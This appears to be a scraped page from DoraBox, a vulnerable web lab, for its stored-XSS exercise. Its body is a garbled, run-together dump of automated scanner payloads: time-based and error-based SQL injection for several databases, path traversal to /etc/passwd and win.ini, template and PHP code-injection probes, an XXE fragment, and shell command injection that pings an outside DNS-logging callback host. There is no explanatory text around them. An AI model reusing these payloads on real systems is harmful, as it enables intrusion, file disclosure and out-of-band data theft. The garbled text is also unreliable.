DoraBox - 存储XSS

2022202320222023202220232022202220232022202220232023202220222023202320222022202320232023202220222023202320222022202220232023202220222022202320232022202320232022202320232022202220222023202320232022202220222023202320222022adminadmin expr 867931881 + 852617944 admin|expr 880933361 + 933117772 ywtoutghlfvynyxuszzyadmin$(expr 864216132 + 815641005)adminadminadmin/*1*/{{816557634+910861903}}admin${@var_dump(md5(665975582))};'-var_dump(md5(274926338))-'../../../../../../../../../../../../../../../../../../etc/passwd../../../../../../../../../../../../../../../../../../etc/passwdadmin${837260960+938656318}./../../../../../../../../../../../../../../../../../../etc/passwdadminadmin%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdadmin&set /A 808064714+937585604adminadminadmin'and/**/extractvalue(1,concat(char(126),md5(1867926659)))and'adminadmin"and/**/extractvalue(1,concat(char(126),md5(1472139466)))and"adminadminadmin'and'q'='qextractvalue(1,concat(char(126),md5(1917932505)))${973394181+806806170}admin'and'e'='zadmin'and(select'1'from/**/cast(md5(1091979712)as/**/int))>'0${(978603122+991859800)?c}admin"and"n"="nadmin/**/and/**/cast(md5('1437269866')as/**/int)>0#set($c=879702763+905379201)${c}$cadmin"and"x"="e<%- 816382119+892374617 %>convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1845649817')))adminadmin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1382307630')))>'0adminadminadmin鎈'"\(adminadminadmin'"\(adminadmin'and(select*from(select+sleep(0))a/**/union/**/select+1)='adminadminadmin'and(select*from(select+sleep(2))a/**/union/**/select+1)='adminadminadmin"and(select*from(select+sleep(0))a/**/union/**/select+1)="adminadmin"and(select*from(select+sleep(2))a/**/union/**/select+1)="adminadminadminadminadminadmin%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd../../../../../../etc/passwd../../../../../../etc/passwdadmin./../../../../../../etc/passwd%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd/etc/passwd/etc/passwdadmin%2fetc%2fpasswd%u2215etc%u2215passwdadmin"and(select*from(select+sleep(3))a/**/union/**/select+1)="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin'/**/and(select'1'from/**/pg_sleep(0))::text>'0admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0admin'and(select+1)>0waitfor/**/delay'0:0:0admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='madmin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',2)='oadminadminadminadminadminadminadminadmin2022202220232023202320232022202220222023adminadminadminhbxxxvbjogfydrdmgiazadminadminadminadminadminadminadminadminadminadminadminadminadminadmin expr 977593698 + 993625245 admin|expr 916927591 + 825775800 admin$(expr 846799256 + 801899230)admin&set /A 880849094+925556363${@var_dump(md5(402633652))};'-var_dump(md5(755340616))-'/*1*/{{885411555+968123839}}${973312458+854277039}${(836528312+801268198)?c}#set($c=929215080+868310194)${c}$c<%- 887350058+921182438 %>expr 857843742 + 842788092adminadminadminadmin'and/**/extractvalue(1,concat(char(126),md5(1985507608)))and'admin"and/**/extractvalue(1,concat(char(126),md5(1428623220)))and"extractvalue(1,concat(char(126),md5(1121838274)))admin'and(select'1'from/**/cast(md5(1107750999)as/**/int))>'0admin/**/and/**/cast(md5('1743542485')as/**/int)>0convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1961761833')))admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1178292034')))>'0admin鎈'"\(admin'"\(admin'and'u'='uadmin'and'o'='eadmin"and"c"="cadmin"and"a"="qadminadminadminadmin'and(select*from(select+sleep(0))a/**/union/**/select+1)='admin'and(select*from(select+sleep(6))a/**/union/**/select+1)='admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="admin"and(select*from(select+sleep(6))a/**/union/**/select+1)="admin'/**/and(select'1'from/**/pg_sleep(0))>'0admin'/**/and(select'1'from/**/pg_sleep(6))>'0admin'and(select+1)>0waitfor/**/delay'0:0:0admin'and(select+1)>0waitfor/**/delay'0:0:6admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='badmin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',6)='lv';waitfor/**/delay'0:0:0'/**/--/**/m';waitfor/**/delay'0:0:6'/**/--/**/m');waitfor/**/delay'0:0:0'/**/--/**/p');waitfor/**/delay'0:0:6'/**/--/**/adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin'adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin;ping -nc 1 command_49_234_20_216_lab_WWW_CTF_3_xss_store.call.21by75.dns3log.cnset|set&set&&ping -nc 1 command_49_234_20_216_lab_WWW_CTF_3_xss_store.call.21by75.dns3log.cn|ping -nc 1 command_49_234_20_216_lab_WWW_CTF_3_xss_store.call.21by75.dns3log.cn;set|set&set&&set|set&set|set|set&setping -nc 1 command_49_234_20_216_lab_WWW_CTF_3_xss_store.call.21by75.dns3log.cnadmin${@var_dump(md5(1992156))};admin;${@var_dump(md5(1992156))}; ]> &xxe;2023202320222023202220222022202320232023202320222022202320232022202220232022202320232022202220232022202220232023202220222023202220232023202220222023202320222022202220232023202320222022202220232023202320232022202220232023202220232022202220232023202220232023202220222023202220232023202220232023202320222022202220222023202220232022202220232023